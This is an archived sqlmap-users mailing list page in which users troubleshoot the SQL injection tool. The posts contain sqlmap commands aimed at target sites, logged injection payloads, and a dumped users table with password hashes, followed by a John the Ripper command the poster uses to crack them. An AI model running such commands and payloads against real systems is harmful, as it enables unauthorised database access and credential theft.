sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Could not detect MS database injection

[Hans W. <wur...@go...>]

Propably has something to do with this.

16:38:17] [WARNING] HTTP error codes detected during testing:

400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times


Did you try the tamper scripts ?

Am 15.12.2012 um 17:10 schrieb Volker Nebelung <
vol...@rw...>:

Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know
there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site" --batch

sqlmap gives me the following result:

…

[16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be
injectable (possible DBMS: Microsoft Access)

[16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'

[16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE
or HAVING clause' injectable

[16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS
could be Microsoft Access. Do you want to skip test payloads specific for
other DBMSes? [Y/n] Y

[16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[16:36:29] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other potential injection
technique found

[16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is
a false positive

[16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep
testing the others (if any)? [y/N] N

sqlmap identified the following injection points with a total of 34 HTTP(s)
requests:

---

Place: URI

Parameter: #1*

   Type: boolean-based blind

   Title: AND boolean-based blind - WHERE or HAVING clause

   Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site

---

[16:37:11] [INFO] testing Microsoft Access

[16:37:13] [INFO] confirming Microsoft Access

[16:37:14] [WARNING] the back-end DBMS is not Microsoft Access

[16:37:14] [INFO] testing MySQL

[16:37:16] [WARNING] the back-end DBMS is not MySQL

[16:37:16] [INFO] testing Oracle

[16:37:17] [WARNING] the back-end DBMS is not Oracle

[16:37:17] [INFO] testing PostgreSQL

[16:37:18] [WARNING] the back-end DBMS is not PostgreSQL

[16:37:18] [INFO] testing Microsoft SQL Server

[16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server

[16:37:19] [INFO] testing SQLite

[16:37:20] [WARNING] the back-end DBMS is not SQLite

[16:37:20] [INFO] testing Firebird

[16:37:21] [WARNING] the back-end DBMS is not Firebird

[16:37:21] [INFO] testing SAP MaxDB

[16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB

[16:37:22] [INFO] testing Sybase

[16:37:23] [WARNING] the back-end DBMS is not Sybase

[16:37:23] [INFO] testing IBM DB2

[16:37:24] [WARNING] the back-end DBMS is not IBM DB2

[16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end
database management system, but from the HTML error page it was possible to
determinate that the back-end DBMS is Microsoft Access. Do not specify the
back-end DBMS manually, sqlmap will fingerprint the DBMS for you

[16:37:24] [WARNING] HTTP error codes detected during testing:

400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times


[*] shutting down at 16:37:24


I am confused at this point: Is sqlmap thinking that the DBMS is MS Access
or not?
When I manually try following URL in my browser "
http://example.net/de/de'/site" I get a 500 HTML-page with output
"Microsoft JET Database Engine Error …" so I would say the DBMS is MS
Access.
When I now try to get for example all tables, then following happens:

python sqlmap.py -u "example.net/de/de*/site" --batch --tables


   sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover
tool

   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program


[*] starting at 16:38:02


[16:38:05] [INFO] custom injection marking character ('*') found in option
'-u'. Do you want to process it? [Y/n/q] Y

[16:38:05] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:

---

Place: URI

Parameter: #1*

   Type: boolean-based blind

   Title: AND boolean-based blind - WHERE or HAVING clause

   Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site

---

[16:38:07] [INFO] testing MySQL

[16:38:08] [INFO] heuristics detected web page charset 'ascii'

[16:38:08] [WARNING] the back-end DBMS is not MySQL

[16:38:08] [INFO] testing Oracle

[16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'

[16:38:09] [WARNING] the back-end DBMS is not Oracle

[16:38:09] [INFO] testing PostgreSQL

[16:38:10] [WARNING] reflective value(s) found and filtering out

[16:38:10] [WARNING] the back-end DBMS is not PostgreSQL

[16:38:10] [INFO] testing Microsoft SQL Server

[16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server

[16:38:11] [INFO] testing SQLite

[16:38:12] [WARNING] the back-end DBMS is not SQLite

[16:38:12] [INFO] testing Microsoft Access

[16:38:12] [INFO] confirming Microsoft Access

[16:38:13] [WARNING] the back-end DBMS is not Microsoft Access

[16:38:13] [INFO] testing Firebird

[16:38:14] [WARNING] the back-end DBMS is not Firebird

[16:38:14] [INFO] testing SAP MaxDB

[16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB

[16:38:15] [INFO] testing Sybase

[16:38:16] [WARNING] the back-end DBMS is not Sybase

[16:38:16] [INFO] testing IBM DB2

[16:38:17] [WARNING] the back-end DBMS is not IBM DB2

[16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end
database management system. Support for this DBMS will be implemented at
some point

[16:38:17] [WARNING] HTTP error codes detected during testing:

400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times


[*] shutting down at 16:38:17


Even when i try to use --text-only or --not-string switches I am not able
to receive the tables. Any ideas?


Best regards

Volker Nebelung

------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d

_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[sqlmap-users] Could not detect MS database injection

[Volker N. <vol...@rw...>]

Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site" --batch

sqlmap gives me the following result:

> …
> [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be injectable (possible DBMS: Microsoft Access)
> [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
> [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
> [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [16:36:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
> [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
> [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:37:11] [INFO] testing Microsoft Access
> [16:37:13] [INFO] confirming Microsoft Access
> [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> [16:37:14] [INFO] testing MySQL
> [16:37:16] [WARNING] the back-end DBMS is not MySQL
> [16:37:16] [INFO] testing Oracle
> [16:37:17] [WARNING] the back-end DBMS is not Oracle
> [16:37:17] [INFO] testing PostgreSQL
> [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> [16:37:18] [INFO] testing Microsoft SQL Server
> [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:37:19] [INFO] testing SQLite
> [16:37:20] [WARNING] the back-end DBMS is not SQLite
> [16:37:20] [INFO] testing Firebird
> [16:37:21] [WARNING] the back-end DBMS is not Firebird
> [16:37:21] [INFO] testing SAP MaxDB
> [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:37:22] [INFO] testing Sybase
> [16:37:23] [WARNING] the back-end DBMS is not Sybase
> [16:37:23] [INFO] testing IBM DB2
> [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> [16:37:24] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
> 
> [*] shutting down at 16:37:24

I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or not?
When I manually try following URL in my browser "http://example.net/de/de'/site" I get a 500 HTML-page with output "Microsoft JET Database Engine Error …" so I would say the DBMS is MS Access.
When I now try to get for example all tables, then following happens:

> python sqlmap.py -u "example.net/de/de*/site" --batch --tables
> 
>     sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover tool
>     http://sqlmap.org
> 
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
> 
> [*] starting at 16:38:02
> 
> [16:38:05] [INFO] custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
> [16:38:05] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:38:07] [INFO] testing MySQL
> [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> [16:38:08] [WARNING] the back-end DBMS is not MySQL
> [16:38:08] [INFO] testing Oracle
> [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> [16:38:09] [WARNING] the back-end DBMS is not Oracle
> [16:38:09] [INFO] testing PostgreSQL
> [16:38:10] [WARNING] reflective value(s) found and filtering out
> [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> [16:38:10] [INFO] testing Microsoft SQL Server
> [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:38:11] [INFO] testing SQLite
> [16:38:12] [WARNING] the back-end DBMS is not SQLite
> [16:38:12] [INFO] testing Microsoft Access
> [16:38:12] [INFO] confirming Microsoft Access
> [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> [16:38:13] [INFO] testing Firebird
> [16:38:14] [WARNING] the back-end DBMS is not Firebird
> [16:38:14] [INFO] testing SAP MaxDB
> [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:38:15] [INFO] testing Sybase
> [16:38:16] [WARNING] the back-end DBMS is not Sybase
> [16:38:16] [INFO] testing IBM DB2
> [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
> [16:38:17] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
> 
> [*] shutting down at 16:38:17

Even when i try to use --text-only or --not-string switches I am not able to receive the tables. Any ideas?


Best regards

Volker Nebelung

Re: [sqlmap-users] sqlmap not compatible with python < 3.2 anymore?

[Dennis <kor...@ya...>]

You rock (as always) ;)

Thanks


Am 14.12.2012 14:35, schrieb Miroslav Stampar:
> Fixed.
>
> Bye
>
> On Fri, Dec 14, 2012 at 2:22 PM, Dennis <kor...@ya...
> <mailto:kor...@ya...>> wrote:
>
>     Hi guys,
>
>     since I updated sqlmap today, I get the following python error (using
>     Python 2.6.7):
>     $ ./sqlmap.py --help
>     Traceback (most recent call last):
>       File "./sqlmap.py", line 15, in <module>
>         from _sqlmap import main
>       File "/home/dst/bin/sqlmap/_sqlmap.py", line 48, in <module>
>         from lib.utils.restapi import restAPIrun
>       File "/home/dst/bin/sqlmap/lib/utils/restapi.py", line 8, in
>     <module>
>         import argparse
>     ImportError: No module named argparse
>
>     Quick google tells me that 'argparse' has been added to python in
>     version 3.2. Is the assumption then correct that sqlmap needs python
>     >3.2 from now on?
>
>     Cheers
>     Dennis
>
>
>     ------------------------------------------------------------------------------
>     LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
>     Remotely access PCs and mobile devices and provide instant support
>     Improve your efficiency, and focus on delivering more value-add
>     services
>     Discover what IT Professionals Know. Rescue delivers
>     http://p.sf.net/sfu/logmein_12329d2d
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] sqlmap not compatible with python < 3.2 anymore?

[Miroslav S. <mir...@gm...>]

Fixed.

Bye

On Fri, Dec 14, 2012 at 2:22 PM, Dennis <kor...@ya...> wrote:

> Hi guys,
>
> since I updated sqlmap today, I get the following python error (using
> Python 2.6.7):
> $ ./sqlmap.py --help
> Traceback (most recent call last):
>   File "./sqlmap.py", line 15, in <module>
>     from _sqlmap import main
>   File "/home/dst/bin/sqlmap/_sqlmap.py", line 48, in <module>
>     from lib.utils.restapi import restAPIrun
>   File "/home/dst/bin/sqlmap/lib/utils/restapi.py", line 8, in <module>
>     import argparse
> ImportError: No module named argparse
>
> Quick google tells me that 'argparse' has been added to python in
> version 3.2. Is the assumption then correct that sqlmap needs python
> >3.2 from now on?
>
> Cheers
> Dennis
>
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] sqlmap not compatible with python < 3.2 anymore?

[Dennis <kor...@ya...>]

Hi guys,

since I updated sqlmap today, I get the following python error (using
Python 2.6.7):
$ ./sqlmap.py --help
Traceback (most recent call last):
  File "./sqlmap.py", line 15, in <module>
    from _sqlmap import main
  File "/home/dst/bin/sqlmap/_sqlmap.py", line 48, in <module>
    from lib.utils.restapi import restAPIrun
  File "/home/dst/bin/sqlmap/lib/utils/restapi.py", line 8, in <module>
    import argparse
ImportError: No module named argparse

Quick google tells me that 'argparse' has been added to python in
version 3.2. Is the assumption then correct that sqlmap needs python
>3.2 from now on?

Cheers
Dennis

[sqlmap-users] Seeking web developers to join the sqlmap project

[Bernardo D. A. G. <ber...@gm...>]

Hi,

Sooner or later all projects go web and with the over hyped web 2.0
era and the high availability of eye-candy web development frameworks
we have plans to follow the infosec tools herd starting by developing
a RESTful API to interact with the sqlmap engine independently from
the command line.

As of a couple of days ago we do have an XML-RPC service[1] thanks to
Miroslav, although we have decided internally after much bitching to
replace it with a REST-JSON API[7] to let anyone script and interact
with the sqlmap engine via HTTP.
The idea is to put the API behind some kind of authentication and
allow concurrent sessions by different "users" whereby sqlmap API can
be run (e.g. python sqlmap --daemon or similar) on a predefined
interface and TCP port and clients can query the API on such TCP port
to mount attacks against a single target or multiple targets[5].

Needless to say that we are at an early design phase hence this email.
It is that time of the year again when the most prepare for holidays
and celebrating Christmas with family (enjoy!) and the few Internauts
addicted contribute towards the sqlmap project with ideas and code[2]
so if you feel like:

* You have experience with web development in Python or..
* ..you have motivation and time enough to learn how to develop a
RESTful API in Python and..
* ..you are familiar or keen on learning Python web frameworks like
Flask[3] and Bottle[4] and..
* ..you have the guts to commit your time to discuss the design of
this (or others) feature and contribute code[2] to one of the most
acclaimed[6] and discussed (blamed sometimes) IT security tools out
there..

..then do not hesitate to reply to this email either privately to us
only (de...@sq...) or publicly hitting the "Reply" button in your
favorite mail client.

We look forward to reading from you. Yes, I am looking at you Python
software developer with web skills!

[1] https://github.com/sqlmapproject/sqlmap/issues/287
[2] https://github.com/sqlmapproject/sqlmap/blob/master/CONTRIBUTING.md#submitting-code-changes
[3] http://flask.pocoo.org
[4] http://bottlepy.org
[5] how cool is this
[6] http://sectools.org/tool/sqlmap/
[7] https://github.com/sqlmapproject/sqlmap/issues/297

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] What is this ??

[Miroslav S. <mir...@gm...>]

Hi.

You've put sqlmap into background process and you expect it to accept
console output at your will :). I believe that's not something we could
help you along.

"do you want to skip those kind of cases (and save scanning time)? [y/N] y
bash: y: command not found"

Kind regards,
Miroslav Stampar

On Wed, Dec 12, 2012 at 9:54 PM, <dr...@sa...> wrote:

> Hi everyone i google but nothing came up that was related to this, on
> OWASP scanner i had a sql injection alert and i try to test it with
> sqlmap but i got a error and nothing happens the program just escapes
> with this :
>
> ...
>
>
>
> python sqlmap.py -u
> http://www.target.tk/inscritos.php?tipoInscricao=3&tipoDir=119%20AND%201=2
> [1] 2816
> [lol@whitehat sqlmap]$
>      sqlmap/1.0-dev - automatic SQL injection and database takeover tool
>      http://sqlmap.org
>
> [*] starting at 20:38:36
>
> [20:38:37] [INFO] testing connection to the target url
> [20:38:37] [INFO] testing if the url is stable, wait a few seconds
> [20:38:38] [INFO] url is stable
> [20:38:38] [INFO] testing if GET parameter 'tipoInscricao' is dynamic
> [20:38:39] [INFO] confirming that GET parameter 'tipoInscricao' is dynamic
> [20:38:40] [INFO] GET parameter 'tipoInscricao' is dynamic
> [20:38:40] [WARNING] reflective value(s) found and filtering out
> [20:38:40] [WARNING] frames detected containing attacked parameter
> values. Please be sure to test those separately in case that attack on
> this page fails
> [20:38:41] [ERROR] possible integer casting detected (e.g.
> tipoInscricao=(int)$_REQUEST('tipoInscricao')) at the back-end web
> application
> do you want to skip those kind of cases (and save scanning time)? [y/N] y
> bash: y: command not found
>
> [1]+  Stopped                 python sqlmap.py -u
> http://www.target.tk/inscritos.php?tipoInscricao=3
> [lol@whitehat sqlmap]$
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] What is this ??

[Luka P. <lu...@pu...>]

Remove those SQL commands from your parameters!

Try:
sqlmap -u "http://www.target.tk/inscritos.php?tipoInscricao=3&tipoDir=119"
-p tipoDir

On Thu, Dec 13, 2012 at 12:38 AM, Julius Kivimäki
<jul...@gm...> wrote:
> Maybe you should take a quick look at what you are doing here and then try
> again without repeating your stupid error.
>
> 2012/12/12 <dr...@sa...>
>
>> do you want to skip those kind of cases (and save scanning time)? [y/N] y
>
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] What is this ??

[Julius K. <jul...@gm...>]

Maybe you should take a quick look at what you are doing here and then try
again without repeating your stupid error.

2012/12/12 <dr...@sa...>

> do you want to skip those kind of cases (and save scanning time)? [y/N] y
>

[sqlmap-users] What is this ??

[<dr...@sa...>]

Hi everyone i google but nothing came up that was related to this, on  
OWASP scanner i had a sql injection alert and i try to test it with  
sqlmap but i got a error and nothing happens the program just escapes  
with this :

...



python sqlmap.py -u  
http://www.target.tk/inscritos.php?tipoInscricao=3&tipoDir=119%20AND%201=2
[1] 2816
[lol@whitehat sqlmap]$
     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
     http://sqlmap.org

[*] starting at 20:38:36

[20:38:37] [INFO] testing connection to the target url
[20:38:37] [INFO] testing if the url is stable, wait a few seconds
[20:38:38] [INFO] url is stable
[20:38:38] [INFO] testing if GET parameter 'tipoInscricao' is dynamic
[20:38:39] [INFO] confirming that GET parameter 'tipoInscricao' is dynamic
[20:38:40] [INFO] GET parameter 'tipoInscricao' is dynamic
[20:38:40] [WARNING] reflective value(s) found and filtering out
[20:38:40] [WARNING] frames detected containing attacked parameter  
values. Please be sure to test those separately in case that attack on  
this page fails
[20:38:41] [ERROR] possible integer casting detected (e.g.  
tipoInscricao=(int)$_REQUEST('tipoInscricao')) at the back-end web  
application
do you want to skip those kind of cases (and save scanning time)? [y/N] y
bash: y: command not found

[1]+  Stopped                 python sqlmap.py -u  
http://www.target.tk/inscritos.php?tipoInscricao=3
[lol@whitehat sqlmap]$

Re: [sqlmap-users] doubt on the table

[<dr...@sa...>]

Well i installed the jumbo version and used ur command and it worked tnx.

Quoting Miroslav Stampar <mir...@gm...>:
>
> Hi.
>  
> Please try with:
>  
> john --format=raw-sha1 pwd
>  
> Kind regards,
> Miroslav Stampar
>
> On Tue, Dec 11, 2012 at 11:49 PM, <dr...@sa...> wrote:
>>
>>
>>       how do i crack this dumps ?
>>
>>
>>       Place: GET
>>       Parameter: id
>>            Type: boolean-based blind
>>            Title: AND boolean-based blind - WHERE or HAVING clause
>>            Payload: id=37 AND 5567=5567
>>
>>            Type: UNION query
>>            Title: MySQL UNION query (NULL) - 6 columns
>>            Payload: id=-1879 UNION ALL SELECT
>>        
>> NULL,NULL,CONCAT(0x3a7876633a,0x4f737648636161497a5a,0x3a6f63633a),NULL,NULL,NULL#
>>
>>            Type: AND/OR time-based blind
>>            Title: MySQL > 5.0.11 AND time-based blind
>>            Payload: id=37 AND SLEEP(5)
>>       ---
>>
>>
>>
>>       Table: users
>>       [2 entries]
>>       +----+-----------+--------+------------------------------------------+
>>       | id | nome      | status | password                                 |
>>       +----+-----------+--------+------------------------------------------+
>>       | 15 | alexandra | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
>>       | 16 | admin     | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
>>       +----+-----------+--------+------------------------------------------+
>>
>>       [d@whitechat run]$ cat pwd
>>       9e19a4e7642ae910145d3015e36824d03aa64026
>>       9e19a4e7642ae910145d3015e36824d03aa64026
>>
>>       [d@whitechat run]$ ./john pwd
>>       No password hashes loaded (see FAQ)
>>
>>
>>
>>
>>       Com os melhores cumprimentos , Luis Gomes.
>>
>>        
>> ------------------------------------------------------------------------------
>>       LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
>>       Remotely access PCs and mobile devices and provide instant support
>>       Improve your efficiency, and focus on delivering more  
>> value-add services
>>       Discover what IT Professionals Know. Rescue delivers
>> http://p.sf.net/sfu/logmein_12329d2d
>>       _______________________________________________
>>       sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
>  
>    --
>    Miroslav Stampar
> http://about.me/stamparm
>

 
Com os melhores cumprimentos , Luis Gomes.

Re: [sqlmap-users] doubt on the table

[Miroslav S. <mir...@gm...>]

Hi.

Please try with:

john --format=raw-sha1 pwd

Kind regards,
Miroslav Stampar

On Tue, Dec 11, 2012 at 11:49 PM, <dr...@sa...> wrote:

>
> how do i crack this dumps ?
>
>
> Place: GET
> Parameter: id
>      Type: boolean-based blind
>      Title: AND boolean-based blind - WHERE or HAVING clause
>      Payload: id=37 AND 5567=5567
>
>      Type: UNION query
>      Title: MySQL UNION query (NULL) - 6 columns
>      Payload: id=-1879 UNION ALL SELECT
>
> NULL,NULL,CONCAT(0x3a7876633a,0x4f737648636161497a5a,0x3a6f63633a),NULL,NULL,NULL#
>
>      Type: AND/OR time-based blind
>      Title: MySQL > 5.0.11 AND time-based blind
>      Payload: id=37 AND SLEEP(5)
> ---
>
>
>
> Table: users
> [2 entries]
> +----+-----------+--------+------------------------------------------+
> | id | nome      | status | password                                 |
> +----+-----------+--------+------------------------------------------+
> | 15 | alexandra | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
> | 16 | admin     | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
> +----+-----------+--------+------------------------------------------+
>
> [d@whitechat run]$ cat pwd
> 9e19a4e7642ae910145d3015e36824d03aa64026
> 9e19a4e7642ae910145d3015e36824d03aa64026
>
> [d@whitechat run]$ ./john pwd
> No password hashes loaded (see FAQ)
>
>
>
>
> Com os melhores cumprimentos , Luis Gomes.
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] doubt on the table

[<dr...@sa...>]

how do i crack this dumps ?


Place: GET
Parameter: id
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: id=37 AND 5567=5567

     Type: UNION query
     Title: MySQL UNION query (NULL) - 6 columns
     Payload: id=-1879 UNION ALL SELECT  
NULL,NULL,CONCAT(0x3a7876633a,0x4f737648636161497a5a,0x3a6f63633a),NULL,NULL,NULL#

     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: id=37 AND SLEEP(5)
---



Table: users
[2 entries]
+----+-----------+--------+------------------------------------------+
| id | nome      | status | password                                 |
+----+-----------+--------+------------------------------------------+
| 15 | alexandra | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
| 16 | admin     | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
+----+-----------+--------+------------------------------------------+

[d@whitechat run]$ cat pwd
9e19a4e7642ae910145d3015e36824d03aa64026
9e19a4e7642ae910145d3015e36824d03aa64026

[d@whitechat run]$ ./john pwd
No password hashes loaded (see FAQ)




Com os melhores cumprimentos , Luis Gomes.

Re: [sqlmap-users] Blob data type

[Miroslav S. <mir...@gm...>]

Hi again.

Just retried with --hex and BLOB column inside a testing table (inserted
some binaries from /bin) and it works out of box.

Have you tried using --hex in --dump mode? Also, HEX inside --sql-shell
won't work for all cases because for example ERROR-based injection needs
splitting of values to be retrieved correctly.

Kind regards.

On Sat, Dec 8, 2012 at 9:13 AM, Miroslav Stampar <mir...@gm...
> wrote:

> Hi.
>
> Still on our Issues list [1]. Currently there is indeed some data types
> that requires more attention than --hex. We'll work on it, can't promise
> you dates.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/8
>
>
> On Sat, Dec 8, 2012 at 7:41 AM, Mardian Gunawan <gun...@gm...>wrote:
>
>> Hi all,
>>
>> How do you fech/get mysql blob data using sqlmap?. i've tried using
>> HEX() on sqlmap --sql-shell function, I still dont know how to get the
>> actual data.
>>
>> --
>> Cheers,
>> Gunma
>> http://gunma.rootedker.nl
>>
>>
>> ------------------------------------------------------------------------------
>> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
>> Remotely access PCs and mobile devices and provide instant support
>> Improve your efficiency, and focus on delivering more value-add services
>> Discover what IT Professionals Know. Rescue delivers
>> http://p.sf.net/sfu/logmein_12329d2d
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Blob data type

[Miroslav S. <mir...@gm...>]

Hi.

Still on our Issues list [1]. Currently there is indeed some data types
that requires more attention than --hex. We'll work on it, can't promise
you dates.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/8

On Sat, Dec 8, 2012 at 7:41 AM, Mardian Gunawan <gun...@gm...>wrote:

> Hi all,
>
> How do you fech/get mysql blob data using sqlmap?. i've tried using
> HEX() on sqlmap --sql-shell function, I still dont know how to get the
> actual data.
>
> --
> Cheers,
> Gunma
> http://gunma.rootedker.nl
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Blob data type

[Mardian G. <gun...@gm...>]

Hi all,

How do you fech/get mysql blob data using sqlmap?. i've tried using
HEX() on sqlmap --sql-shell function, I still dont know how to get the
actual data.

-- 
Cheers,
Gunma
http://gunma.rootedker.nl

Re: [sqlmap-users] HTTP 302 Redirect Not Fully Displayed in Verbose 6 when Following Redirects

[Miroslav S. <mir...@gm...>]

p.s. redirect response messages will now always be displayed in high
